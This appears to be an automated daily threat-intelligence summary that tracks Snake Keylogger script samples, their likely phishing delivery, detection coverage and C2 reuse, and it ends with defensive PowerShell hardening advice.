Daily Summary
Today’s 67% increase above the 7-day average of 7 samples pushed the count to 11, continuing an upward trend. The volume surge is notable for its consistency across the week, with no single day’s spike driving the average higher. This sustained activity suggests an ongoing campaign rather than a short-term burst.
New Samples Detected
PowerShell scripts dominate today, accounting for 6 of the 11 samples, a shift from the typical balanced mix between .ps1 and .bat files. The remaining samples are 4 .bat scripts and 1 JavaScript file. The .js file is a deviation from recent patterns, potentially indicating an attempt to bypass email security filters that flag script attachments differently. No obfuscation changes were observed, but the .js sample may leverage WScript execution.
Distribution Methods
File type distribution heavily favors script-based delivery via email-likely phishing attachments or links to hosted script files. The absence of compiled executables suggests attackers are relying on living-off-the-land binaries (LOLBins) like PowerShell and cmd.exe to download and execute the payload. The single .js sample may be delivered through a different vector, such as a redirected download from a compromised website.
Detection Rate
Current detection rates for today’s samples remain moderate, with most AV engines detecting the core Snake Keylogger payload but showing lower coverage for the script wrappers. The .js variant may have reduced detection due to less common use, though signatures for PowerShell and batch file loaders are well-established.
C2 Infrastructure
No new C2 servers were recorded today, indicating the threat actor is reusing existing infrastructure. This stability often correlates with a steady, low-tempo campaign. Continue monitoring previously known C2 IPs and domains for updated encryption keys or callback patterns.
7-Day Trend
Activity has been rising steadily, with today’s 11 samples marking the highest single-day count in the past week. The upward trajectory suggests the campaign is gaining momentum rather than peaking.
Security Analysis
A non-obvious observation: the increase in .ps1 samples relative to .bat files may indicate a shift toward PowerShell execution policies that bypass User Account Control more reliably. Attackers may be testing which script handler yields better success rates before committing to a mix. Defensive recommendation: enable PowerShell script block logging and constrain language mode to “ConstrainedLanguage” on endpoints to limit malicious script execution without disrupting legitimate admin tasks.